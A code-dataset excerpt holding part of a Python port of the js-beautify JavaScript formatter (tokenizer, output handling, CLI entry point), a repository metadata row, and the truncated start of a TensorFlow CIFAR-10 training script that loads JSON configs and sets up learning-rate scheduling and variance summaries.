        self.add_outputline()

    def add_outputline(self):
        """Start a fresh (empty) current line."""
        self.previous_line = self.current_line
        self.current_line = OutputLine(self)
        self.lines.append(self.current_line)

    def get_line_number(self):
        return len(self.lines)

    def add_new_line(self, force_newline):
        """Open a new line; returns True if a line was actually added."""
        if len(self.lines) == 1 and self.just_added_newline():
            # no newline on start of file
            return False

        if force_newline or not self.just_added_newline():
            if not self.raw:
                self.add_outputline()
            return True
        return False

    def get_code(self):
        """Join all lines and strip trailing whitespace from the result."""
        sweet_code = "\n".join(line.toString() for line in self.lines)
        return re.sub('[\r\n\t ]+$', '', sweet_code)

    def set_indent(self, level):
        """Set the current line's indent level; returns True if applied."""
        # Never indent your first output indent at the start of the file
        if len(self.lines) > 1:
            # Grow the memoized indent cache up to the requested level.
            while level >= len(self.indent_cache):
                self.indent_cache.append(self.indent_cache[-1] + self.indent_string)
            self.current_line.set_indent(level)
            return True
        self.current_line.set_indent(0)
        return False

    def add_raw_token(self, token):
        """Emit a token verbatim, reproducing its original newlines/whitespace."""
        for _ in range(token.newlines):
            self.add_outputline()
        self.current_line.push(token.whitespace_before)
        self.current_line.push(token.text)
        self.space_before_token = False

    def add_token(self, printable_token):
        self.add_space_before_token()
        self.current_line.push(printable_token)

    def add_space_before_token(self):
        # A pending space is dropped at the start of a line.
        if self.space_before_token and not self.just_added_newline():
            self.current_line.push(' ')
        self.space_before_token = False

    def remove_redundant_indentation(self, frame):
        # This implementation is effective but has some issues:
        # - can cause line wrap to happen too soon due to indent removal
        #   after wrap points are calculated
        # These issues are minor compared to ugly indentation.
        if frame.multiline_frame or frame.mode == MODE.ForInitializer or frame.mode == MODE.Conditional:
            return

        # remove one indent from each line inside this section
        index = frame.start_line_index
        while index < len(self.lines):
            self.lines[index].remove_indent()
            index += 1

    def trim(self, eat_newlines = False):
        """Trim trailing spaces; optionally also drop trailing empty lines."""
        self.current_line.trim()
        while eat_newlines and len(self.lines) > 1 and self.current_line.is_empty():
            self.lines.pop()
            self.current_line = self.lines[-1]
            self.current_line.trim()
        if len(self.lines) > 1:
            self.previous_line = self.lines[-2]
        else:
            self.previous_line = None

    def just_added_newline(self):
        return self.current_line.is_empty()

    def just_added_blankline(self):
        """True if the output currently ends with a completely blank line."""
        if self.just_added_newline():
            if len(self.lines) == 1:
                return True
            line = self.lines[-2]
            return line.is_empty()
        return False
class Tokenizer:
    """Splits JavaScript source text into a list of Token objects.

    The main entry point is tokenize(); __tokenize_next() scans one token
    at a time and returns (text, type) tuples — block comments return a
    third element carrying parsed 'beautify' directives.
    """

    whitespace = ["\n", "\r", "\t", " "]
    digit = re.compile('[0-9]')
    digit_hex = re.compile('[0123456789abcdefABCDEF]')

    punct = ('+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! ~ , : ? ^ ^= |= :: =>' \
        + ' <?= <? ?> <%= <% %>').split(' ')

    # Words which always should start on a new line
    line_starters = 'continue,try,throw,return,var,let,const,if,switch,case,default,for,while,break,function,import,export'.split(',')
    reserved_words = line_starters + ['do', 'in', 'else', 'get', 'set', 'new', 'catch', 'finally', 'typeof', 'yield', 'async', 'await']

    def __init__ (self, input, opts, indent_string):
        self.input = input
        self.opts = opts
        self.indent_string = indent_string
        self.acorn = Acorn()

        # /* ... */ comment ends with nearest */ or end of file
        self.block_comment_pattern = re.compile('([\s\S]*?)((?:\*\/)|$)')

        # comment ends just before nearest linefeed or end of file
        self.comment_pattern = re.compile(self.acorn.six.u('([^\n\r\u2028\u2029]*)'))

        # '/* beautify key:value ... */' directive comments
        self.directives_block_pattern = re.compile('\/\* beautify( \w+[:]\w+)+ \*\/')
        self.directive_pattern = re.compile(' (\w+)[:](\w+)')
        self.directives_end_ignore_pattern = re.compile('([\s\S]*?)((?:\/\*\sbeautify\signore:end\s\*\/)|$)')

        # PHP / ASP style template blocks passed through as strings
        self.template_pattern = re.compile('((<\?php|<\?=)[\s\S]*?\?>)|(<%[\s\S]*?%>)')

    def tokenize(self):
        """Scan the whole input and return the token list.

        Comments are attached to the following token via comments_before;
        matching bracket pairs are linked through the 'parent' attribute.
        """
        self.in_html_comment = False
        self.parser_pos = 0
        self.tokens = []

        # NOTE: 'next' and 'open' shadow builtins locally (kept as-is).
        next = None
        last = None
        open = None
        open_stack = []
        comments = []

        while not (not last == None and last.type == 'TK_EOF'):
            token_values = self.__tokenize_next()
            next = Token(token_values[1], token_values[0], self.n_newlines, self.whitespace_before_token)

            # Fold consecutive comments/unknowns into comments_before of the
            # next real token.
            while next.type == 'TK_COMMENT' or next.type == 'TK_BLOCK_COMMENT' or next.type == 'TK_UNKNOWN':
                if next.type == 'TK_BLOCK_COMMENT':
                    next.directives = token_values[2]
                comments.append(next)
                token_values = self.__tokenize_next()
                next = Token(token_values[1], token_values[0], self.n_newlines, self.whitespace_before_token)

            if len(comments) > 0:
                next.comments_before = comments
                comments = []

            if next.type == 'TK_START_BLOCK' or next.type == 'TK_START_EXPR':
                next.parent = last
                open_stack.append(open)
                open = next
            elif (next.type == 'TK_END_BLOCK' or next.type == 'TK_END_EXPR') and \
                (not open == None and ( \
                    (next.text == ']' and open.text == '[') or \
                    (next.text == ')' and open.text == '(') or \
                    (next.text == '}' and open.text == '{'))):
                next.parent = open.parent
                open = open_stack.pop()

            self.tokens.append(next)
            last = next
        return self.tokens

    def get_directives (self, text):
        """Parse '/* beautify k:v ... */' text into a dict, or None."""
        if not self.directives_block_pattern.match(text):
            return None

        directives = {}
        directive_match = self.directive_pattern.search(text)

        while directive_match:
            directives[directive_match.group(1)] = directive_match.group(2)
            directive_match = self.directive_pattern.search(text, directive_match.end())

        return directives

    def __tokenize_next(self):
        """Scan one token starting at self.parser_pos.

        Returns (text, type) — or (text, type, directives) for block
        comments. Also updates self.n_newlines and
        self.whitespace_before_token for the scanned gap.
        """
        whitespace_on_this_line = []
        self.n_newlines = 0
        self.whitespace_before_token = ''

        if self.parser_pos >= len(self.input):
            return '', 'TK_EOF'

        if len(self.tokens) > 0:
            last_token = self.tokens[-1]
        else:
            # For the sake of tokenizing we can pretend that there was an
            # open brace to start
            last_token = Token('TK_START_BLOCK', '{')

        c = self.input[self.parser_pos]
        self.parser_pos += 1

        # Consume whitespace, counting newlines and remembering the
        # same-line whitespace immediately before the token.
        while c in self.whitespace:
            if self.acorn.newline.match(c):
                # treat \r\n as one newline
                if not (c == '\n' and self.input[self.parser_pos-2] == '\r'):
                    self.n_newlines += 1
                    whitespace_on_this_line = []
            else:
                whitespace_on_this_line.append(c)

            if self.parser_pos >= len(self.input):
                return '', 'TK_EOF'

            c = self.input[self.parser_pos]
            self.parser_pos += 1

        if len(whitespace_on_this_line) != 0:
            self.whitespace_before_token = ''.join(whitespace_on_this_line)

        # --- numbers (decimal, hex, exponent) ---
        if self.digit.match(c):
            allow_decimal = True
            allow_e = True
            local_digit = self.digit

            if c == '0' and self.parser_pos < len(self.input) and re.match('[Xx]', self.input[self.parser_pos]):
                # switch to hex number, no decimal or e, just hex digits
                allow_decimal = False
                allow_e = False
                c += self.input[self.parser_pos]
                self.parser_pos += 1
                local_digit = self.digit_hex
            else:
                # we know this first loop will run. It keeps the logic simpler.
                c = ''
                self.parser_pos -= 1

            # Add the digits
            while self.parser_pos < len(self.input) and local_digit.match(self.input[self.parser_pos]):
                c += self.input[self.parser_pos]
                self.parser_pos += 1

                if allow_decimal and self.parser_pos < len(self.input) and self.input[self.parser_pos] == '.':
                    c += self.input[self.parser_pos]
                    self.parser_pos += 1
                    allow_decimal = False

                if allow_e and self.parser_pos < len(self.input) and re.match('[Ee]', self.input[self.parser_pos]):
                    c += self.input[self.parser_pos]
                    self.parser_pos += 1

                    if self.parser_pos < len(self.input) and re.match('[+-]', self.input[self.parser_pos]):
                        c += self.input[self.parser_pos]
                        self.parser_pos += 1

                    allow_e = False
                    allow_decimal = False

            return c, 'TK_WORD'

        # --- identifiers and reserved words ---
        if self.acorn.isIdentifierStart(ord(self.input[self.parser_pos-1])):
            if self.parser_pos < len(self.input):
                while self.acorn.isIdentifierChar(ord(self.input[self.parser_pos])):
                    c = c + self.input[self.parser_pos]
                    self.parser_pos += 1
                    if self.parser_pos == len(self.input):
                        break

            if not (last_token.type == 'TK_DOT' \
                        or (last_token.type == 'TK_RESERVED' and last_token.text in ['set', 'get'])) \
                    and c in self.reserved_words:
                if c == 'in': # in is an operator, need to hack
                    return c, 'TK_OPERATOR'

                return c, 'TK_RESERVED'

            return c, 'TK_WORD'

        # --- single-character structural tokens ---
        if c in '([':
            return c, 'TK_START_EXPR'

        if c in ')]':
            return c, 'TK_END_EXPR'

        if c == '{':
            return c, 'TK_START_BLOCK'

        if c == '}':
            return c, 'TK_END_BLOCK'

        if c == ';':
            return c, 'TK_SEMICOLON'

        # --- comments (must be checked before '/' as an operator/regex) ---
        if c == '/':
            comment = ''
            inline_comment = True
            if self.input[self.parser_pos] == '*': # peek /* .. */ comment
                self.parser_pos += 1
                comment_match = self.block_comment_pattern.match(self.input, self.parser_pos)
                comment = '/*' + comment_match.group(0)
                self.parser_pos += len(comment_match.group(0))
                directives = self.get_directives(comment)
                if directives and directives.get('ignore') == 'start':
                    # swallow everything up to 'beautify ignore:end'
                    comment_match = self.directives_end_ignore_pattern.match(self.input, self.parser_pos)
                    comment += comment_match.group(0)
                    self.parser_pos += len(comment_match.group(0))
                comment = re.sub(self.acorn.lineBreak, '\n', comment)
                return comment, 'TK_BLOCK_COMMENT', directives

            if self.input[self.parser_pos] == '/': # peek // comment
                self.parser_pos += 1
                comment_match = self.comment_pattern.match(self.input, self.parser_pos)
                comment = '//' + comment_match.group(0)
                self.parser_pos += len(comment_match.group(0))
                return comment, 'TK_COMMENT'

        # --- string / template / regex / e4x literals ---
        # A '/' or '<' only starts a literal when the previous token makes a
        # regex/xml legal at this position.
        if c == '`' or c == "'" or c == '"' or \
            ( \
                (c == '/') or \
                (self.opts.e4x and c == "<" and re.match('^<([-a-zA-Z:0-9_.]+|{[^{}]*}|!\[CDATA\[[\s\S]*?\]\])(\s+[-a-zA-Z:0-9_.]+\s*=\s*(\'[^\']*\'|"[^"]*"|{.*?}))*\s*(/?)\s*>', self.input[self.parser_pos - 1:])) \
            ) and ( \
                (last_token.type == 'TK_RESERVED' and last_token.text in ['return', 'case', 'throw', 'else', 'do', 'typeof', 'yield']) or \
                (last_token.type == 'TK_END_EXPR' and last_token.text == ')' and \
                    last_token.parent and last_token.parent.type == 'TK_RESERVED' and last_token.parent.text in ['if', 'while', 'for']) or \
                (last_token.type in ['TK_COMMENT', 'TK_START_EXPR', 'TK_START_BLOCK', 'TK_END_BLOCK', 'TK_OPERATOR', \
                    'TK_EQUALS', 'TK_EOF', 'TK_SEMICOLON', 'TK_COMMA'])):
            sep = c
            esc = False
            esc1 = 0    # count of digits consumed for a \x/\u escape
            esc2 = 0    # expected digit count for the pending escape (2 or 4)
            resulting_string = c
            in_char_class = False

            if sep == '/':
                # handle regexp
                in_char_class = False
                while self.parser_pos < len(self.input) and \
                        (esc or in_char_class or self.input[self.parser_pos] != sep) and \
                        not self.acorn.newline.match(self.input[self.parser_pos]):
                    resulting_string += self.input[self.parser_pos]
                    if not esc:
                        esc = self.input[self.parser_pos] == '\\'
                        if self.input[self.parser_pos] == '[':
                            in_char_class = True
                        elif self.input[self.parser_pos] == ']':
                            in_char_class = False
                    else:
                        esc = False
                    self.parser_pos += 1
            elif self.opts.e4x and sep == '<':
                # handle e4x xml literals
                xmlRegExp = re.compile('<(\/?)([-a-zA-Z:0-9_.]+|{[^{}]*}|!\[CDATA\[[\s\S]*?\]\])(\s+[-a-zA-Z:0-9_.]+\s*=\s*(\'[^\']*\'|"[^"]*"|{.*?}))*\s*(/?)\s*>')
                xmlStr = self.input[self.parser_pos - 1:]
                match = xmlRegExp.match(xmlStr)
                if match:
                    # Walk matching tags until the root tag's depth closes.
                    rootTag = match.group(2)
                    depth = 0
                    while (match):
                        isEndTag = match.group(1)
                        tagName = match.group(2)
                        isSingletonTag = (match.groups()[-1] != "") or (match.group(2)[0:8] == "![CDATA[")
                        if tagName == rootTag and not isSingletonTag:
                            if isEndTag:
                                depth -= 1
                            else:
                                depth += 1

                        if depth <= 0:
                            break

                        match = xmlRegExp.search(xmlStr, match.end())

                    if match:
                        xmlLength = match.end() # + len(match.group())
                    else:
                        xmlLength = len(xmlStr)

                    self.parser_pos += xmlLength - 1
                    xmlStr = re.sub(self.acorn.lineBreak, '\n', xmlStr[:xmlLength])
                    return xmlStr, 'TK_STRING'
            else:
                # handle string (quotes and backtick templates; backtick
                # strings may span lines)
                while self.parser_pos < len(self.input) and \
                        (esc or (self.input[self.parser_pos] != sep and
                            (sep == '`' or not self.acorn.newline.match(self.input[self.parser_pos])))):
                    resulting_string += self.input[self.parser_pos]

                    # Handle \r\n linebreaks after escapes or in template strings
                    if self.input[self.parser_pos] == '\r' and self.parser_pos + 1 < len(self.input) and self.input[self.parser_pos + 1] == '\n':
                        self.parser_pos += 1
                        resulting_string += '\n'

                    # Completed a \xHH or \uHHHH escape: optionally unescape
                    # it to the printable-ASCII character it denotes.
                    if esc1 and esc1 >= esc2:
                        try:
                            esc1 = int(resulting_string[-esc2:], 16)
                        except Exception:
                            esc1 = False
                        if esc1 and esc1 >= 0x20 and esc1 <= 0x7e:
                            esc1 = chr(esc1)
                            resulting_string = resulting_string[:-2 - esc2]
                            if esc1 == sep or esc1 == '\\':
                                resulting_string += '\\'
                            resulting_string += esc1
                        esc1 = 0

                    if esc1:
                        esc1 += 1
                    elif not esc:
                        esc = self.input[self.parser_pos] == '\\'
                    else:
                        esc = False
                        if self.opts.unescape_strings:
                            if self.input[self.parser_pos] == 'x':
                                esc1 += 1
                                esc2 = 2
                            elif self.input[self.parser_pos] == 'u':
                                esc1 += 1
                                esc2 = 4
                    self.parser_pos += 1

            if self.parser_pos < len(self.input) and self.input[self.parser_pos] == sep:
                resulting_string += sep
                self.parser_pos += 1

                if sep == '/':
                    # regexps may have modifiers /regexp/MOD, so fetch those too
                    # Only [gim] are valid, but if the user puts in garbage, do what we can to take it.
                    while self.parser_pos < len(self.input) and self.acorn.isIdentifierStart(ord(self.input[self.parser_pos])):
                        resulting_string += self.input[self.parser_pos]
                        self.parser_pos += 1

            resulting_string = re.sub(self.acorn.lineBreak, '\n', resulting_string)
            return resulting_string, 'TK_STRING'

        if c == '#':
            # she-bang
            if len(self.tokens) == 0 and len(self.input) > self.parser_pos and self.input[self.parser_pos] == '!':
                resulting_string = c
                while self.parser_pos < len(self.input) and c != '\n':
                    c = self.input[self.parser_pos]
                    resulting_string += c
                    self.parser_pos += 1
                return resulting_string.strip() + '\n', 'TK_UNKNOWN'

            # Spidermonkey-specific sharp variables for circular references
            # https://developer.mozilla.org/En/Sharp_variables_in_JavaScript
            # http://mxr.mozilla.org/mozilla-central/source/js/src/jsscan.cpp around line 1935
            sharp = '#'
            if self.parser_pos < len(self.input) and self.digit.match(self.input[self.parser_pos]):
                while True:
                    c = self.input[self.parser_pos]
                    sharp += c
                    self.parser_pos += 1
                    if self.parser_pos >= len(self.input) or c == '#' or c == '=':
                        break

            if c == '#' or self.parser_pos >= len(self.input):
                pass
            elif self.input[self.parser_pos] == '[' and self.input[self.parser_pos + 1] == ']':
                sharp += '[]'
                self.parser_pos += 2
            elif self.input[self.parser_pos] == '{' and self.input[self.parser_pos + 1] == '}':
                sharp += '{}'
                self.parser_pos += 2
            return sharp, 'TK_WORD'

        # --- PHP/ASP template blocks passed through verbatim ---
        if c == '<' and self.input[self.parser_pos] in ['?', '%']:
            template_match = self.template_pattern.match(self.input, self.parser_pos - 1)
            if template_match:
                c = template_match.group(0)
                self.parser_pos += len(c) - 1
                c = re.sub(self.acorn.lineBreak, '\n', c)
                return c, 'TK_STRING'

        # --- legacy HTML comment wrappers around scripts ---
        if c == '<' and self.input[self.parser_pos - 1 : self.parser_pos + 3] == '<!--':
            self.parser_pos += 3
            c = '<!--'
            while self.parser_pos < len(self.input) and not self.acorn.newline.match(self.input[self.parser_pos]):
                c += self.input[self.parser_pos]
                self.parser_pos += 1
            self.in_html_comment = True
            return c, 'TK_COMMENT'

        if c == '-' and self.in_html_comment and self.input[self.parser_pos - 1 : self.parser_pos + 2] == '-->':
            self.in_html_comment = False
            self.parser_pos += 2
            return '-->', 'TK_COMMENT'

        if c == '.':
            return c, 'TK_DOT'

        # --- multi-character punctuation (greedy longest match) ---
        if c in self.punct:
            while self.parser_pos < len(self.input) and c + self.input[self.parser_pos] in self.punct:
                c += self.input[self.parser_pos]
                self.parser_pos += 1
                if self.parser_pos >= len(self.input):
                    break

            if c == ',':
                return c, 'TK_COMMA'
            if c == '=':
                return c, 'TK_EQUALS'
            return c, 'TK_OPERATOR'

        return c, 'TK_UNKNOWN'
def isFileDifferent(filepath, expected):
    """Return True if the file's content differs from *expected*, or if the
    file cannot be read at all.

    Fixes: the file handle is now closed deterministically (was leaked),
    and the bare 'except:' no longer swallows KeyboardInterrupt/SystemExit.
    """
    try:
        with open(filepath) as f:
            return f.read() != expected
    except Exception:
        # Unreadable/missing file counts as "different" so the caller
        # proceeds to (re)write it.
        return True
def main():
    """Command-line entry point for the beautifier.

    Parses sys.argv, builds an options object from the flags, beautifies the
    requested file (or stdin with -i/--stdin) and writes the result to stdout
    or to --outfile.  Returns 0 on success, 1 on failure, or usage() output
    for invalid arguments.

    Fixes in this revision:
    * missing comma between 'eol=' and 'outfile=' (they were fused into the
      bogus long option 'eol=outfile=')
    * 'wrap-line-length' now declared with '=' so it accepts its argument
    * '--wrap-line-length ' (trailing space) could never match -- trimmed
    * ('--eval-code') was a bare string, so ``opt in`` did substring
      matching -- now a proper one-element tuple
    * '--space_after_anon_function' used underscores and never matched the
      declared dash-separated long option
    """
    argv = sys.argv[1:]
    try:
        # NOTE(review): short option 'l:' / long 'indent-level=' are accepted
        # but never handled in the loop below; kept for CLI compatibility.
        opts, args = getopt.getopt(argv, "s:c:e:o:rdEPjabkil:xhtfvXnCw:",
            ['indent-size=', 'indent-char=', 'eol=', 'outfile=', 'replace',
             'disable-preserve-newlines', 'space-in-paren',
             'space-in-empty-paren', 'jslint-happy',
             'space-after-anon-function', 'brace-style=',
             'keep-array-indentation', 'indent-level=', 'unescape-strings',
             'help', 'usage', 'stdin', 'eval-code', 'indent-with-tabs',
             'keep-function-indentation', 'version', 'e4x',
             'end-with-newline', 'comma-first', 'wrap-line-length='])
    except getopt.GetoptError as ex:
        print(ex, file=sys.stderr)
        return usage(sys.stderr)

    js_options = default_options()

    file = None
    outfile = 'stdout'
    replace = False
    if len(args) == 1:
        file = args[0]

    for opt, arg in opts:
        if opt in ('--keep-array-indentation', '-k'):
            js_options.keep_array_indentation = True
        elif opt in ('--keep-function-indentation', '-f'):
            js_options.keep_function_indentation = True
        elif opt in ('--outfile', '-o'):
            outfile = arg
        elif opt in ('--replace', '-r'):
            replace = True
        elif opt in ('--indent-size', '-s'):
            js_options.indent_size = int(arg)
        elif opt in ('--indent-char', '-c'):
            js_options.indent_char = arg
        elif opt in ('--eol', '-e'):
            js_options.eol = arg
        elif opt in ('--indent-with-tabs', '-t'):
            js_options.indent_with_tabs = True
        elif opt in ('--disable-preserve-newlines', '-d'):
            js_options.preserve_newlines = False
        elif opt in ('--space-in-paren', '-P'):
            js_options.space_in_paren = True
        elif opt in ('--space-in-empty-paren', '-E'):
            js_options.space_in_empty_paren = True
        elif opt in ('--jslint-happy', '-j'):
            js_options.jslint_happy = True
        elif opt in ('--space-after-anon-function', '-a'):
            js_options.space_after_anon_function = True
        elif opt in ('--eval-code',):
            js_options.eval_code = True
        elif opt in ('--brace-style', '-b'):
            js_options.brace_style = arg
        elif opt in ('--unescape-strings', '-x'):
            js_options.unescape_strings = True
        elif opt in ('--e4x', '-X'):
            js_options.e4x = True
        elif opt in ('--end-with-newline', '-n'):
            js_options.end_with_newline = True
        elif opt in ('--comma-first', '-C'):
            js_options.comma_first = True
        elif opt in ('--wrap-line-length', '-w'):
            js_options.wrap_line_length = int(arg)
        elif opt in ('--stdin', '-i'):
            file = '-'
        elif opt in ('--version', '-v'):
            return print(__version__)
        elif opt in ('--help', '--usage', '-h'):
            return usage()

    if not file:
        print("Must define at least one file.", file=sys.stderr)
        return usage(sys.stderr)
    else:
        try:
            # --replace means "beautify in place" unless reading from stdin.
            if outfile == 'stdout' and replace and not file == '-':
                outfile = file
            pretty = beautify_file(file, js_options)
            if outfile == 'stdout':
                sys.stdout.write(pretty)
            else:
                # Only touch the output file when its content would change.
                if isFileDifferent(outfile, pretty):
                    mkdir_p(os.path.dirname(outfile))
                    with open(outfile, 'w') as f:
                        f.write(pretty)
        except Exception as ex:
            print(ex, file=sys.stderr)
            return 1

    # Success
    return 0
| [
"morosainos@163.com"
] | morosainos@163.com |
78680cec484ff812e360cf2ec9f892a5a9b4884a | dd0a15517807ba4e0f965606071a874e68c88015 | /classification_for_cifar10/train.py | 38e456d95416b42549c2445a837ba25905fc33f1 | [] | no_license | lyxzzz/PWSConv_backup | ad062277d10a50ade35c92dd66c70f118eff85d9 | 5a0ae0d7ca414828c5def0b4ed3a280cbeafef1c | refs/heads/main | 2023-01-28T21:05:07.906071 | 2020-12-11T16:34:42 | 2020-12-11T16:34:42 | 320,268,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,510 | py | import datetime
import os
import sys
import time
import tensorflow as tf
from tensorflow.contrib import slim
import numpy as np
import json
import math
import random
sys.path.append('python')
import cfg_loader
import preprocessing_loader
import data_loader
import model_loader
import eval_func
import optimizer_config
from utils import eval_tools
from utils import tf_utils
from utils.epoch_info_record import EpochRecorder
from utils import file_tools
from utils import progress_bar
tf.app.flags.DEFINE_integer('seed', None, '')
tf.app.flags.DEFINE_float('moving_average_decay', 0.997, '')
tf.app.flags.DEFINE_string('ckpt_name', None, '')
tf.app.flags.DEFINE_string('conv_type', None, '')
tf.app.flags.DEFINE_string('norm_type', None, '')
tf.app.flags.DEFINE_float('pwsepsilon', None, '')
tf.app.flags.DEFINE_integer('batch_size', None, '')
tf.app.flags.DEFINE_float('memory_fraction', 0.5, '')
tf.app.flags.DEFINE_string('model', 'vgg', '')
tf.app.flags.DEFINE_string('model_abstract', None, '')
tf.app.flags.DEFINE_float('learning_rate', None, '')
tf.app.flags.DEFINE_integer('gpuid', 1, '')
FLAGS = tf.app.flags.FLAGS
class Fetch:
    """Bundles tensors for a single sess.run() call.

    ``add`` registers a named group of tensors and remembers where that group
    lives inside the flat ``fetchlist``; ``get`` slices the corresponding
    values back out of the flat result list returned by sess.run().
    """

    def __init__(self):
        self.fetchlist = []
        self.index = {}

    def add(self, val, name):
        """Append the tensors in *val* under *name*."""
        start = len(self.fetchlist)
        self.index[name] = [start, len(val)]
        self.fetchlist.extend(val)

    def get(self, real_val, name):
        """Return the slice of *real_val* that belongs to group *name*."""
        start, count = self.index[name]
        return real_val[start:start + count]
def _summary_mean_var(input, axes, name):
    """Emit scalar summaries '<name>_mean' and '<name>_var' for *input*.

    The moments are taken over *axes* and then collapsed to single scalars
    with reduce_mean before being logged.
    """
    moment_mean, moment_var = tf.nn.moments(input, axes=axes)
    moment_mean = tf.reduce_mean(moment_mean)
    moment_var = tf.reduce_mean(moment_var)
    tf.summary.scalar(name + '_mean', moment_mean)
    tf.summary.scalar(name + '_var', moment_var)
def info(var, mul=1.0):
    """Print variance/mean diagnostics for a numpy array *var*.

    For arrays with more than one dimension the *mul* argument is ignored
    and replaced by the product of all but the last dimension; the printed
    'after mul' value is the array variance scaled by that factor.
    """
    if len(var.shape) > 1:
        mul = 1.0
        for dim in var.shape[:-1]:
            mul *= dim
    print("shape:{}, var:{}, mean:{}, mul:{}, after mul:{}".format(
        var.shape, np.var(var), np.mean(var), mul, np.var(var) * mul))
def make_var_mean_summary(para_list):
    """Add mean/variance summaries for raw classification and box outputs.

    *para_list* is a pair ``(raw_pred, raw_loc)``; each element is a list of
    per-layer tensors that gets concatenated along axis 1 before the
    statistics are computed.  Fix in this revision: the original computed
    ``len(raw_pred)`` into an unused local (``layer_len``); removed.
    """
    raw_pred, raw_loc = para_list
    raw_pred = tf.concat(raw_pred, axis=1)
    raw_loc = tf.concat(raw_loc, axis=1)
    # Channel 0 is treated as the negative/background score, the remaining
    # 20 channels as per-class scores, and raw_loc as 4-vector box offsets.
    neg_pred = tf.reshape(raw_pred[:, :, 0], [-1])
    pos_pred = tf.reshape(raw_pred[:, :, 1:], [-1, 20])
    loc_pred = tf.reshape(raw_loc, [-1, 4])
    _summary_mean_var(neg_pred, 0, 'batch/neg')
    _summary_mean_var(pos_pred, 0, 'batch/pos')
    _summary_mean_var(loc_pred, 0, 'batch/loc')
    _summary_mean_var(raw_pred, [1, 2], 'batch/total')
def __parser_cmd_to_json(var, json_dict, name):
    """Copy a command-line override into the config dict when it was given.

    A value of None means "flag not supplied on the command line"; in that
    case *json_dict* is left untouched.
    """
    if var is None:
        return
    json_dict[name] = var
def main(argv=None):
# Training entry point invoked by tf.app.run(); `argv` is unused -- all
# configuration comes from the global FLAGS object and the model's JSON
# config under train_cfgs/.
if FLAGS.seed is not None:
random.seed(FLAGS.seed)
# --- load the JSON config and split it into its sections ---
config_path = os.path.join('train_cfgs', FLAGS.model+'.json')
with open(config_path, 'r') as json_file:
start_cfg_dict = json.load(json_file)
TRAIN_PARAMETERS = start_cfg_dict['train_parameters']
RESTORE_PARAMETERS = start_cfg_dict['restore_parameters']
DATASET_PARAMETERS = start_cfg_dict['dataset']
BACKBONE_PARAMETERS = start_cfg_dict['backbone']
NETWORK_PARAMETERS = start_cfg_dict['network']
LOSSES_PARAMETERS = start_cfg_dict['losses']
AUGMENT_PARAMETERS = start_cfg_dict['augmentation']
# Command-line flags (when not None) override the JSON config entries.
__parser_cmd_to_json(FLAGS.ckpt_name, TRAIN_PARAMETERS, 'ckpt_name')
__parser_cmd_to_json(FLAGS.conv_type, NETWORK_PARAMETERS, 'conv_type')
__parser_cmd_to_json(FLAGS.norm_type, NETWORK_PARAMETERS, 'norm_func')
__parser_cmd_to_json(FLAGS.batch_size, TRAIN_PARAMETERS, 'train_batch_nums')
__parser_cmd_to_json(FLAGS.pwsepsilon, NETWORK_PARAMETERS, 'pwsepsilon')
# The learning_rate flag acts as a multiplier on the whole LR schedule.
if FLAGS.learning_rate is not None:
for i in range(len(TRAIN_PARAMETERS['learning_rate'])):
TRAIN_PARAMETERS['learning_rate'][i] = TRAIN_PARAMETERS['learning_rate'][i] * FLAGS.learning_rate
ROOT_CFG = cfg_loader.get_cfgs(start_cfg_dict.get('default_network_cfgs','emptyCFG'), start_cfg_dict)
# --- GPU selection and output directories ---
gpu_id = FLAGS.gpuid
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
now = datetime.datetime.now()
StyleTime = now.strftime("%Y-%m-%d")
file_tools.touch_dir(TRAIN_PARAMETERS['logs_path'] + FLAGS.model_abstract)
file_tools.touch_dir(TRAIN_PARAMETERS['ckpt_path'])
# --- dataset and input placeholders ---
preload_train_dataset, obj_type_nums = data_loader.get_train_dataset(DATASET_PARAMETERS['train'])
train_data_size = len(preload_train_dataset)
# prepare_data is indexed below as [0]=images, [1]=is_training flag,
# [2]=labels -- presumably placeholders; confirm in preprocessing_loader.
prepare_data = preprocessing_loader.prepare_before_model_construct('train', ROOT_CFG)
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
# --- initial learning rate: resume value or first schedule entry ---
if RESTORE_PARAMETERS['restore']:
lr_init = RESTORE_PARAMETERS['learning_rate']
else:
lr_init = TRAIN_PARAMETERS['learning_rate'][0]
# Optional linear warmup from warmup_init up to lr_init over warmup_epoch
# epochs; warmup_ratios is the per-epoch LR increment.
if 'warmup_epoch' in TRAIN_PARAMETERS and TRAIN_PARAMETERS['warmup_epoch'] != 0:
warmup_epoch = TRAIN_PARAMETERS['warmup_epoch']
warmup_init = TRAIN_PARAMETERS['warmup_init']
learning_rate = tf.Variable(warmup_init, trainable=False)
warmup_ratios = (lr_init - warmup_init) / warmup_epoch
else:
warmup_epoch = 0
warmup_ratios = 0.0
learning_rate = tf.Variable(lr_init, trainable=False)
tf.summary.scalar('learning_rate', learning_rate)
opt = optimizer_config.get_optimizer_from_cfg(learning_rate, TRAIN_PARAMETERS.get('optimizer', None))
# --- build forward pass and losses on the selected GPU ---
with tf.device('/gpu:%d' % gpu_id):
with tf.name_scope('model') as scope:
model_outputs = model_loader.forward(ROOT_CFG,
obj_type_nums,
prepare_data[0],
prepare_data[1],
backbone_name=BACKBONE_PARAMETERS['type'])
loss_list = model_loader.losses(ROOT_CFG,
model_outputs,
prepare_data,
loss_name=LOSSES_PARAMETERS['type'])
# Per-convolution input/output variance summaries (skips header convs);
# the slicing strips the "model/tpn_backbone/" prefix and "/Conv2D:0"
# suffix from the tensor name to build the summary tag.
conv_output = tf.get_collection('conv_output')
conv_input = tf.get_collection('conv_input')
kernel_real_var_list = tf.get_collection('kernel_real_var')
for i, c in enumerate(conv_output):
if "header" not in c.name:
logname = c.name[len("model/tpn_backbone/"):-len("/Conv2D:0")]
m, v = tf.nn.moments(c, [0, 1, 2], name='moments')
tf.summary.scalar("{}/output".format(logname), tf.reduce_min(v))
m, v = tf.nn.moments(conv_input[i], [0, 1, 2], name='moments')
tf.summary.scalar("{}/input".format(logname), tf.reduce_min(v))
tf.summary.scalar("{}/realvar".format(logname), kernel_real_var_list[i])
ema_var_list = None
# losses_description yields (index of the total loss in loss_list, names
# of the losses to report, [start, end] slice of reportable losses).
losses_description = model_loader.losses_description(loss_name=LOSSES_PARAMETERS['type'])
total_loss_index = losses_description[0]
print_loss_dict = losses_description[1]
print_loss_index = losses_description[2]
